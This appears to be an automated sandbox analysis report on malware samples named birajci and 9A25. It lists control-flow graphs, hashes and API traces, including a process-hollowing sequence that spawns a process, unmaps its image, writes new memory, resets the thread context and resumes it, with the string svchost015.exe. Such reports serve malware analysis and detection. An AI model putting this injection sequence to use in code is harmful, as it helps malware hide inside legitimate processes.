                                                    • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                    • Instruction ID: 385db6ec30348a4611532b2edd8baef849cc63295ecf85ab64ace8f86e30940b
                                                    • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                    • Instruction Fuzzy Hash: D9413731218E098FD768EF6CA845B6277D1F798311F6643AAE809D3389EA34DC1183C5

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 394 4030b2-4030d0 396 4030d3-4030fc 394->396 397 403094-4030b1 NtTerminateProcess 394->397 401 403104-403109 396->401 402 4030fe 396->402 403 403112-403134 call 40118b 401->403 404 40310b 401->404 402->401 405 403100-403102 402->405 411 403138 403->411 404->403 406 40310d-403110 404->406 406->403 411->411
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2403612883.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_birajci.jbxd
                                                    Similarity
                                                    • API ID: ProcessTerminate
                                                    • String ID:
                                                    • API String ID: 560597551-0
                                                    • Opcode ID: 65859489a4ee9faed147b0567641968f4d00accd6ffd6793ae8748d9f8272d5d
                                                    • Instruction ID: 842373eb4463ac9e834e9e22d1360699520a6be1e431551352f4b65e49395860
                                                    • Opcode Fuzzy Hash: 65859489a4ee9faed147b0567641968f4d00accd6ffd6793ae8748d9f8272d5d
                                                    • Instruction Fuzzy Hash: BA018E3360D01556C71C9A7848012F56F56D784321F34413BE1566B5D7D63E8A0B5587

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 67003c-670047 1 67004c-670263 call 670a3f call 670e0f call 670d90 VirtualAlloc 0->1 2 670049 0->2 17 670265-670289 call 670a69 1->17 18 67028b-670292 1->18 2->1 23 6702ce-6703c2 VirtualProtect call 670cce call 670ce7 17->23 19 6702a1-6702b0 18->19 22 6702b2-6702cc 19->22 19->23 22->19 29 6703d1-6703e0 23->29 30 6703e2-670437 call 670ce7 29->30 31 670439-6704b8 VirtualFree 29->31 30->29 32 6705f4-6705fe 31->32 33 6704be-6704cd 31->33 36 670604-67060d 32->36 37 67077f-670789 32->37 35 6704d3-6704dd 33->35 35->32 39 6704e3-670505 35->39 36->37 42 670613-670637 36->42 40 6707a6-6707b0 37->40 41 67078b-6707a3 37->41 51 670517-670520 39->51 52 670507-670515 39->52 44 6707b6-6707cb 40->44 45 67086e-6708be LoadLibraryA 40->45 41->40 46 67063e-670648 42->46 48 6707d2-6707d5 44->48 50 6708c7-6708f9 45->50 46->37 49 67064e-67065a 46->49 53 6707d7-6707e0 48->53 54 670824-670833 48->54 49->37 55 670660-67066a 49->55 56 670902-67091d 50->56 57 6708fb-670901 50->57 58 670526-670547 51->58 52->58 59 6707e4-670822 53->59 60 6707e2 53->60 62 670839-67083c 54->62 61 67067a-670689 55->61 57->56 63 67054d-670550 58->63 59->48 60->54 64 670750-67077a 61->64 65 67068f-6706b2 61->65 62->45 66 67083e-670847 62->66 68 670556-67056b 63->68 69 6705e0-6705ef 63->69 64->46 70 6706b4-6706ed 65->70 71 6706ef-6706fc 65->71 72 67084b-67086c 66->72 73 670849 66->73 74 67056f-67057a 68->74 75 67056d 68->75 69->35 70->71 76 6706fe-670748 71->76 77 67074b 71->77 72->62 73->45 80 67057c-670599 74->80 81 67059b-6705bb 74->81 75->69 76->77 77->61 84 6705bd-6705db 80->84 81->84 84->63
                                                    APIs
                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0067024D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2404360688.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_670000_birajci.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID: cess$kernel32.dll
                                                    • API String ID: 4275171209-1230238691
                                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                    • Instruction ID: 3765450f4516cd5a446ec64091ac8bb535a0f3870ef1ebb4caee572cfbf4afc2
                                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                    • Instruction Fuzzy Hash: 69526A74A01229DFEB64CF58C985BA8BBB1BF09304F1480D9E54DAB351DB30AE95DF24

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 378 6fa7e0-6fa7f9 379 6fa7fb-6fa7fd 378->379 380 6fa7ff 379->380 381 6fa804-6fa810 CreateToolhelp32Snapshot 379->381 380->381 382 6fa812-6fa818 381->382 383 6fa820-6fa82d Module32First 381->383 382->383 388 6fa81a-6fa81e 382->388 384 6fa82f-6fa830 call 6fa49f 383->384 385 6fa836-6fa83e 383->385 389 6fa835 384->389 388->379 388->383 389->385
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006FA808
                                                    • Module32First.KERNEL32(00000000,00000224), ref: 006FA828
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2404618518.00000000006E8000.00000040.00000020.00020000.00000000.sdmp, Offset: 006E8000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6e8000_birajci.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 3833638111-0
                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                    • Instruction ID: 1e90f9a1465180adc3b49b297b142ff79324e3129c3fb9b1b00556d17a663252
                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                    • Instruction Fuzzy Hash: 03F0F6715003186FD7203FF8988DBBE76F9AF48364F100128E75AD11C0DBB0EC464662

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 391 670e0f-670e24 SetErrorMode * 2 392 670e26 391->392 393 670e2b-670e2c 391->393 392->393
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(00000400,?,?,00670223,?,?), ref: 00670E19
                                                    • SetErrorMode.KERNELBASE(00000000,?,?,00670223,?,?), ref: 00670E1E
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2404360688.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_670000_birajci.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                    • Instruction ID: 5a5a572b8c797ad976ea18bf62a4cab0582b95af9600aa588e6fb0acf5fca8fa
                                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                    • Instruction Fuzzy Hash: 6FD01231145128B7D7002A94DC09BCD7B1CDF09B62F008411FB0DD9180C770994046E5

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 412 401869-4018cc call 40110f Sleep call 40138a 426 4018db-40192a call 40110f 412->426 427 4018ce-4018d6 call 401493 412->427 427->426
                                                    APIs
                                                    • Sleep.KERNELBASE(00001388), ref: 004018B7
                                                      • Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                      • Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2403612883.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_birajci.jbxd
                                                    Similarity
                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                    • String ID:
                                                    • API String ID: 4152845823-0
                                                    • Opcode ID: d06a35291f3f8f1a67eb92b1a4d5f56442e5df8eca4c3459f494d6ac572ad673
                                                    • Instruction ID: c749d285b2de24fc316c817c7ae4fe8e6badb8f794917fcf5296f62f9050bee9
                                                    • Opcode Fuzzy Hash: d06a35291f3f8f1a67eb92b1a4d5f56442e5df8eca4c3459f494d6ac572ad673
                                                    • Instruction Fuzzy Hash: BA117C72A0C208EBE600BA949C42E7A3259AB41755F348037BA07790F0D67D9B13B72B

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 441 401874-4018cc call 40110f Sleep call 40138a 450 4018db-40192a call 40110f 441->450 451 4018ce-4018d6 call 401493 441->451 451->450
                                                    APIs
                                                    • Sleep.KERNELBASE(00001388), ref: 004018B7
                                                      • Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                      • Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2403612883.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_birajci.jbxd
                                                    Similarity
                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                    • String ID:
                                                    • API String ID: 4152845823-0
                                                    • Opcode ID: 68152553fbf31f958f2666c8c24b9d96b65cdd3abd047d41b0fcf87566074689
                                                    • Instruction ID: b17aa293f10861f930621d71b3cc53cbab5e3b4d2edd5f2ed28ca100fb2eaa3d
                                                    • Opcode Fuzzy Hash: 68152553fbf31f958f2666c8c24b9d96b65cdd3abd047d41b0fcf87566074689
                                                    • Instruction Fuzzy Hash: 2C010472A0C245EBEB00ABA09C4297933659F00305F248477B606790F1D57D8712F71B

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 465 401894-4018cc call 40110f Sleep call 40138a 476 4018db-40192a call 40110f 465->476 477 4018ce-4018d6 call 401493 465->477 477->476
                                                    APIs
                                                    • Sleep.KERNELBASE(00001388), ref: 004018B7
                                                      • Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                      • Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2403612883.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_birajci.jbxd
                                                    Similarity
                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                    • String ID:
                                                    • API String ID: 4152845823-0
                                                    • Opcode ID: cf92e4b68736d476fd27c40767b4ebefb699700f173f159b6ae110c0fcf0c166
                                                    • Instruction ID: b8c0f1a70be89906461d65cd061911ad83e0312d7227b68f91b7eb194a97aeae
                                                    • Opcode Fuzzy Hash: cf92e4b68736d476fd27c40767b4ebefb699700f173f159b6ae110c0fcf0c166
                                                    • Instruction Fuzzy Hash: CA015A7260C205EBEB01AA909C42A7A3215AB45355F248437BA17790F1C67D8A53F71B

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 491 401898-4018cc call 40110f Sleep call 40138a 500 4018db-40192a call 40110f 491->500 501 4018ce-4018d6 call 401493 491->501 501->500
                                                    APIs
                                                    • Sleep.KERNELBASE(00001388), ref: 004018B7
                                                      • Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                      • Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2403612883.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_birajci.jbxd
                                                    Similarity
                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                    • String ID:
                                                    • API String ID: 4152845823-0
                                                    • Opcode ID: 214e81ffa9f270bed09b0236bf8c9fa2ab7398f4e2a2ef32b27fb06c8532a1cd
                                                    • Instruction ID: be550ea8b7a21d6326383ffce51d2b737e5c9e0a4d996b68b29bd2ffee87f150
                                                    • Opcode Fuzzy Hash: 214e81ffa9f270bed09b0236bf8c9fa2ab7398f4e2a2ef32b27fb06c8532a1cd
                                                    • Instruction Fuzzy Hash: 32014F7260C205EBEB01AA909D41A7E3255AF45315F248437BA17790F1C67D8653F71B
                                                    APIs
                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006FA4F0
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2404618518.00000000006E8000.00000040.00000020.00020000.00000000.sdmp, Offset: 006E8000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6e8000_birajci.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                    • Instruction ID: bfc8d4a3487f9f52f966ab07bcba371fbb2f93b20ce66cdf37c770301f8aff71
                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                    • Instruction Fuzzy Hash: 12113C79A00208EFDB01DF98C985E99BBF5EF08351F058094FA489B362D371EA90DF81
                                                    APIs
                                                    • Sleep.KERNELBASE(00001388), ref: 004018B7
                                                      • Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                      • Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2403612883.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_birajci.jbxd
                                                    Similarity
                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                    • String ID:
                                                    • API String ID: 4152845823-0
                                                    • Opcode ID: 60e6b54977058768ad97221ce1a21881eac0b699f264f3939cedf6f5eedf2412
                                                    • Instruction ID: 2ebc05d28c21af2a54c4caf66b99915bed587d393384b69dc5fa06e125dea622
                                                    • Opcode Fuzzy Hash: 60e6b54977058768ad97221ce1a21881eac0b699f264f3939cedf6f5eedf2412
                                                    • Instruction Fuzzy Hash: 50018F7260C205EBEB01AA909C41A7E3315AB45311F208437BA06790F1C67D8712F71B
                                                    APIs
                                                    • Sleep.KERNELBASE(00001388), ref: 004018B7
                                                      • Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                      • Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2403612883.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_birajci.jbxd
                                                    Similarity
                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                    • String ID:
                                                    • API String ID: 4152845823-0
                                                    • Opcode ID: 3aa88ae79591668d5f45020df35a97080ef95a9b76e1d5ec1d9a291b84300a95
                                                    • Instruction ID: 055aca88afb56c34d21ecc05ae408393a65145e0cd4b89ba36dd333808a7ed44
                                                    • Opcode Fuzzy Hash: 3aa88ae79591668d5f45020df35a97080ef95a9b76e1d5ec1d9a291b84300a95
                                                    • Instruction Fuzzy Hash: C401627260C205EBEB01AA909D51A6E3355AF45351F208437BA16790F1C67D8652F71B

                                                    Execution Graph

                                                    Execution Coverage:51.1%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:17.1%
                                                    Total number of Nodes:35
                                                    Total number of Limit Nodes:1
                                                    execution_graph 391 301ac00 392 301ac39 391->392 400 301acd1 392->400 401 30193f0 392->401 396 301ad05 419 3019b50 396->419 398 301ad97 422 301a090 NtAllocateVirtualMemory 398->422 402 3019415 401->402 403 3019b50 VirtualAlloc 402->403 404 30194af 403->404 405 3019529 NtCreateFile 404->405 410 30194c1 404->410 406 30195d4 405->406 407 30195cb 405->407 409 301965c FindCloseChangeNotification 406->409 406->410 407->406 408 30195d6 CreateFileMappingA 407->408 411 3019634 MapViewOfFile 408->411 412 3019604 408->412 409->410 410->396 413 30196b0 410->413 411->406 412->406 412->411 415 30196fe 413->415 414 3019717 414->396 415->414 416 30197cd NtProtectVirtualMemory 415->416 428 3019cf0 416->428 420 3019b91 419->420 421 3019bc4 VirtualAlloc 420->421 421->398 423 301a120 422->423 424 301a30a 7 API calls 423->424 426 301a419 424->426 425 301a47d Wow64GetThreadContext Wow64SetThreadContext ResumeThread ExitProcess 425->400 426->425 427 301a440 WriteProcessMemory 426->427 427->426 429 30197fc NtProtectVirtualMemory 428->429 429->414 430 3019c70 431 3019b50 VirtualAlloc 430->431 432 3019c7d 431->432

                                                    Callgraph

                                                    Control-flow Graph

                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000004), ref: 0301A101
                                                    • CreateFileA.KERNELBASE(?,00000003,00000000,00000000,00000004,00000002,00000000), ref: 0301A331
                                                    • WriteFile.KERNELBASE(00000000,?,002DA188,00000000,00000000), ref: 0301A35B
                                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0301A36D
                                                    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000), ref: 0301A3A5
                                                    • NtUnmapViewOfSection.NTDLL(00000000,00400000), ref: 0301A3BF
                                                    • VirtualAllocEx.KERNELBASE(00000000,00400000,?,00003000,00000040), ref: 0301A3EA
                                                    • WriteProcessMemory.KERNELBASE(00000000,00400000,00000000,?,00000000), ref: 0301A40E
                                                    • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 0301A470
                                                    • Wow64GetThreadContext.KERNELBASE(?,00010002), ref: 0301A49E
                                                    • Wow64SetThreadContext.KERNELBASE(?,00010002), ref: 0301A4C9
                                                    • ResumeThread.KERNELBASE(?), ref: 0301A4DB
                                                    • ExitProcess.KERNEL32(00000000), ref: 0301A4E8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2794045093.0000000003019000.00000040.00001000.00020000.00000000.sdmp, Offset: 03019000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3019000_9A25.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process$MemoryThreadWrite$ContextCreateFileVirtualWow64$AllocAllocateChangeCloseExitFindNotificationResumeSectionUnmapView
                                                    • String ID: svchost015.exe
                                                    • API String ID: 2318777327-4092349249
                                                    • Opcode ID: 6506a243c28140b7e605f1682fbb3a02570eb6cda3738287469a7d0f17233479
                                                    • Instruction ID: 082250544e4d04efa4a18013c187154a7264c647bda54bf4140372f8d45c79a8
                                                    • Opcode Fuzzy Hash: 6506a243c28140b7e605f1682fbb3a02570eb6cda3738287469a7d0f17233479
                                                    • Instruction Fuzzy Hash: 3FE10A74A002089FDB54CF58C895FEEB7B5BF88304F148199EA08AB391D771AE85CF94

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 03019B50: VirtualAlloc.KERNELBASE(00000000,030194AF,00003000,00000040), ref: 03019BD4
                                                    • NtCreateFile.NTDLL(00000000,00120089,00000018,?,00000000,00000080,00000001,00000001,00000040,00000000,00000000), ref: 030195BB
                                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0301966C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2794045093.0000000003019000.00000040.00001000.00020000.00000000.sdmp, Offset: 03019000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3019000_9A25.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocChangeCloseCreateFileFindNotificationVirtual
                                                    • String ID: @
                                                    • API String ID: 482251274-2766056989
                                                    • Opcode ID: 0b7c4ba18bb5c7031e5492e0a79fe1b78c7ef608674f7e0fe82617d7bc66c960
                                                    • Instruction ID: 163ba45a66d75840a2996fc0bf8c5604031b11f182e9f049dcd96b5e436440ed
                                                    • Opcode Fuzzy Hash: 0b7c4ba18bb5c7031e5492e0a79fe1b78c7ef608674f7e0fe82617d7bc66c960
                                                    • Instruction Fuzzy Hash: 1E810C75A11218EFEB24DF54CC55FDAB3B5AF88700F1481E9EA0DAB290D7706A84CF94

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 59 30196b0-3019715 call 30192e0 62 3019717-3019719 59->62 63 301971e-3019733 59->63 64 3019821-3019824 62->64 65 3019735-3019737 63->65 66 301973c-3019754 63->66 65->64 67 301975f-3019769 66->67 68 30197b7-30197bb 67->68 69 301976b-301977b 67->69 72 30197c9-30197cb 68->72 73 30197bd-30197c1 68->73 70 30197b5 69->70 71 301977d-30197b3 69->71 70->67 71->68 72->64 73->72 75 30197c3-30197c7 73->75 75->72 76 30197cd-301981c NtProtectVirtualMemory call 3019cf0 NtProtectVirtualMemory 75->76 76->64
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2794045093.0000000003019000.00000040.00001000.00020000.00000000.sdmp, Offset: 03019000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3019000_9A25.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .tex
                                                    • API String ID: 0-1946526065
                                                    • Opcode ID: 550378f57e0bd29913c2f3a96e12ab874d4668b693fd62ef9e030cc3a757d5d4
                                                    • Instruction ID: d00e8ee1150f6b1d1486bced0c64fdcdbd2c019b92cf2b80d9858e0079e59337
                                                    • Opcode Fuzzy Hash: 550378f57e0bd29913c2f3a96e12ab874d4668b693fd62ef9e030cc3a757d5d4
                                                    • Instruction Fuzzy Hash: 26510575D01109EFCB44CF84C8A4BEEFBB5FF48304F248599D815AB280D375AA95CBA0

                                                    Control-flow Graph

                                                    APIs
                                                    • VirtualAlloc.KERNELBASE(00000000,030194AF,00003000,00000040), ref: 03019BD4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2794045093.0000000003019000.00000040.00001000.00020000.00000000.sdmp, Offset: 03019000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3019000_9A25.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID: VirtualAlloc
                                                    • API String ID: 4275171209-164498762
                                                    • Opcode ID: c42a450ca02fa363a87eb9b6114333d3fd783ad335b2bc0464273431a807ed53
                                                    • Instruction ID: 22c685f4dd0e4e44012d2d45a48c97507263d2f3fd83144abcb3ed91dc105527
                                                    • Opcode Fuzzy Hash: c42a450ca02fa363a87eb9b6114333d3fd783ad335b2bc0464273431a807ed53
                                                    • Instruction Fuzzy Hash: AF113D60D08389EEEB01DBE88409BEFBFB55F11704F084098D5446B282D3BA5758CBF6